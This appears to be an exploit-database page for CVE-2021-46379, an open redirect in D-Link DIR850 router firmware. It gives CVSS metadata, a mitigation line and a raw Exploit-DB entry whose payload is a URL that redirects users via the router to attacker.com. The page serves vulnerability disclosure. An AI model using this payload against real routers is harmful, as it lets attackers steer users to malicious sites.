header-logo
Suggest Exploit
vendor:
DIR850
by:
AhmedAlroky
6.1
CVSS
MEDIUM
Open Redirect
601
CWE
Product Name: DIR850
Affected Version From: ET850-1.08TRb03
Affected Version To: ET850-1.08TRb03
Patch Exists: YES
Related CWE: CVE-2021-46379
CPE: h:dlink:dir850
Metasploit:
Other Scripts:
Tags: cve,cve2021,redirect,dlink,router
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei References: https://nvd.nist.gov/vuln/detail/CVE-2021-46379https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/viewhttps://www.dlink.com/en/security-bulletinhttps://www.dlink.com/en/security-bulletin/
Nuclei Metadata: {'max-request': 1, 'verified': True, 'vendor': 'dlink', 'product': 'dir-850l_firmware'}
Platforms Tested:
2022

DLINK DIR850 – Open Redirect

Visiting the URL http://<IP Address>/boafrm/formWlanRedirect?redirect-url=http://attacker.com&wlan_id=1 allows an attacker to redirect users to a malicious website.

Mitigation:

Ensure that the application does not accept user-supplied input for the target of a redirection.
Source

Exploit-DB raw data:

# Exploit Title: DLINK DIR850 - Open Redirect
# Product: Dlink
# Model: DIR850
# Date: 14/1/2022
# CVE: CVE-2021-46379
# Exploit Author: AhmedAlroky
# Hardware version: b1
# Firmware version: ET850-1.08TRb03
# Vendor home page: https://www.dlink.com/

#Exploit : 
Visit http://<IP Address>/boafrm/formWlanRedirect?redirect-url=http://attacker.com&wlan_id=1

Navigation

Suggest Exploit

Services By CQR